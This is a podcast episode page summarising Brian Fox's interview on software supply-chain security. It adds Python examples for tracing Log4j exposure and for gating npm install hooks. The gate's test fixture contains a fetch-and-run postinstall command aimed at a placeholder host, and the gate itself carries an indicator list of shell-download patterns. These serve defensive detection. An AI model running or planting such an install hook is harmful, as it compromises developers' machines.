Securing the Supply Chain… for Software With Brian Fox, Co-Founder, SVP and CTO


“In the Struts case with Equifax, everybody was talking about, ‘Well, the attacks started within the first week of the disclosure.’ The Log4J one — It started within days. You don’t even have days. You don’t have minutes when you’re dealing with a malicious component.”


Companies that do not know what their products are made of are set up for trouble. According to Brian Fox, Co-Founder, SVP and CTO of Sonatype, without that knowledge they cannot tell how to address an issue, or whether bad actors have slipped harmful parts into their products. Fox advises that every part of the software supply chain be identified and secured, just as it would be for a physical product.


Key Insights

The Illusion of Building Alone (02:21)

Humans often exaggerate individual accomplishments. No one person is self-made, and the same is true of the vast majority of products: they are typically assembled from many parts that already exist. Fox describes this reality in software development.

“So the modern application, and this has been true for 10, 15 years at this point, is composed of about 90% third-party components. Most of those are going to be open source. So your developers in this decade are not writing a hundred percent of the code.”

Learning From Other Industries (35:57)

It’s natural to be hyper-focused on one’s own industry, especially if one has a passion for it, but there is a great deal to be learned from other industries. Fox suggests that the software industry can learn from them how to oversee a supply chain.

“And we don’t have to reinvent the wheel. Industries before us have this solved, right? Food can be recalled and traced [and] auto manufacturers can do it. The planes we get on can do it. We just have to follow the same patterns. It’s not actually that hard. What’s hard is getting people to see what they don’t see at the time.”
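The recall-and-trace pattern Fox points to translates directly into a query over a software inventory: which of our applications ship the recalled part, and at which versions. The following is an added example, not code from the podcast or from Sonatype. It assumes an inventory keyed by application with Maven-style component coordinates; the inventory and the application names are constructed for illustration, and the version range used in the usage line (log4j-core from 2.0-beta9 up to, but not including, 2.15.0) is the range published for Log4Shell, CVE-2021-44228, which the page itself does not cite.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Component:
    """One third-party part shipped inside an application (Maven coordinates)."""
    group: str
    name: str
    version: str


# Constructed inventory for illustration: application -> components it ships.
INVENTORY = {
    "billing-api": [
        Component("org.apache.logging.log4j", "log4j-core", "2.14.1"),
        Component("org.springframework", "spring-core", "5.3.13"),
    ],
    "reporting-batch": [
        Component("org.apache.logging.log4j", "log4j-core", "2.17.1"),
    ],
    "legacy-portal": [
        Component("org.apache.logging.log4j", "log4j-core", "2.0-beta9"),
        # log4j 1.x lives under different coordinates and must not match.
        Component("log4j", "log4j", "1.2.17"),
    ],
}

_PRERELEASE = re.compile(r"^([A-Za-z]+)(\d*)$")


def version_key(version: str) -> tuple:
    """Sortable key for versions shaped MAJOR.MINOR[.PATCH][-pre], so that
    2.0-beta9 < 2.0 < 2.14.1 < 2.15.0 (assumed format; extend for others)."""
    main, _, pre = version.partition("-")
    nums = [int(p) if p.isdigit() else 0 for p in main.split(".")]
    nums = (nums + [0, 0, 0])[:3]
    if not pre:
        return (*nums, 1, "", 0)          # a release sorts after its pre-releases
    m = _PRERELEASE.match(pre)
    tag, num = (m.group(1), int(m.group(2) or 0)) if m else (pre, 0)
    return (*nums, 0, tag, num)


def is_affected(c: Component, group: str, name: str, lo: str, hi: str) -> bool:
    """True when c has the recalled coordinates and lo <= version < hi."""
    if (c.group, c.name) != (group, name):
        return False
    return version_key(lo) <= version_key(c.version) < version_key(hi)


def recall(inventory: dict, group: str, name: str, lo: str, hi: str) -> dict:
    """The 'which products contain the recalled part' query:
    returns {application: [affected versions]} for every hit."""
    hits = {}
    for app, comps in inventory.items():
        bad = [c.version for c in comps if is_affected(c, group, name, lo, hi)]
        if bad:
            hits[app] = bad
    return hits


if __name__ == "__main__":
    # Log4Shell affected log4j-core 2.0-beta9 through 2.14.1 (fixed in 2.15.0).
    hits = recall(INVENTORY, "org.apache.logging.log4j", "log4j-core",
                  "2.0-beta9", "2.15.0")
    for app, versions in hits.items():
        print(f"{app}: {', '.join(versions)}")
```

The query only works if the inventory exists before the recall is announced; building it after the fact is what turns a minutes-long lookup into the week-long scramble Fox describes.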

The Problem With “Malicious Components” (23:25)

Fox uses the term “malicious components” for parts of a software product that have been planted to cause harm; the physical-world parallel is someone sneaking a sabotaged part onto a production line. His point: if nobody knows the sabotage has happened, nobody will stop it.

“If you have a traditional application security portfolio or program that is trying to scan and assess things before you put it into production [and] before you ship it to customers, okay, that’s important. You should do that, but it completely is going to miss all the malicious components that are happening on the developer-side.”
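A malicious component that runs the moment a developer installs it is never seen by a scanner that only looks at what is about to ship, so the check has to move to the developer side, before installation. The following is an added example of such a gate, not code from the podcast or from Sonatype. It assumes an npm-style package.json, where the preinstall, install and postinstall scripts execute automatically during installation; the manifests, package names, URL and indicator list are constructed for illustration.

```python
import json

# npm lifecycle scripts that run automatically during `npm install`.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")

# Strings that warrant a human look when they appear in an install hook
# (assumed indicator list for the example; tune it to your environment).
INDICATORS = ("curl ", "wget ", "| sh", "| bash", "base64", "eval(",
              "node -e", "child_process")


def install_hooks(manifest: dict) -> dict:
    """Lifecycle scripts that will execute on the developer's machine at install time."""
    scripts = manifest.get("scripts") or {}
    return {hook: cmd for hook, cmd in scripts.items() if hook in INSTALL_HOOKS}


def assess(manifest: dict) -> dict:
    """Gate one package: 'allow' (no install hooks), 'review' (hooks without
    indicators, e.g. a native build step), 'block' (hooks with indicators)."""
    findings = []
    for hook, cmd in install_hooks(manifest).items():
        findings.append({"hook": hook, "command": cmd,
                         "indicators": [i for i in INDICATORS if i in cmd]})
    if any(f["indicators"] for f in findings):
        verdict = "block"
    elif findings:
        verdict = "review"
    else:
        verdict = "allow"
    return {"package": f'{manifest.get("name")}@{manifest.get("version")}',
            "verdict": verdict, "findings": findings}


def gate(manifests) -> list:
    """Run the check over everything about to be installed; return what is not allowed."""
    return [r for r in (assess(m) for m in manifests) if r["verdict"] != "allow"]


# Constructed package.json contents for illustration (not real packages).
CLEAN = json.loads(
    '{"name": "example-util", "version": "1.0.0", "dependencies": {}}')
NATIVE = json.loads(
    '{"name": "example-native", "version": "2.3.0",'
    ' "scripts": {"install": "node-gyp rebuild", "test": "mocha"}}')
MALICIOUS = json.loads(
    '{"name": "example-helper", "version": "0.0.3",'
    ' "scripts": {"postinstall": "curl -s https://example.invalid/i.sh | sh"}}')


if __name__ == "__main__":
    for result in gate([CLEAN, NATIVE, MALICIOUS]):
        print(json.dumps(result, indent=2))
```

The string match is deliberately crude; the point is where the check runs, not how clever it is. Installing with scripts disabled (npm supports `--ignore-scripts`) is the blunter version of the same idea, at the cost of breaking packages that genuinely need a build step.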

Hardship Can Be a Great Teacher (34:15)

“Human nature is not to act until we’re kind of forced in many cases.” 


Fox suggests that SolarWinds and Log4j have been wake-up calls for the software industry about its supply chain. It is unfortunate that it so often takes great difficulty for people to change. On the other hand, learning from mistakes, or from unexpected troubles, and adjusting accordingly is a good thing; in fact, doing so speaks well of human resilience.


About the Guest:

“Co-founder and CTO, Brian Fox is a member of the Apache Software Foundation and former Chair of the Apache Maven project. As a direct contributor to the Maven ecosystem, including the maven-dependency-plugin and maven-enforcer-plugin, he has over 20 years of experience driving the vision behind, as well as developing and leading the development of software for organizations ranging from startups to large enterprises. Brian is a frequent speaker at national and regional events including Java User Groups and other development-related conferences.”

IT Visionaries is brought to you by The Salesforce Platform.

Mission.org is a media studio producing content for world-class clients. Learn more at mission.org.


Episode 360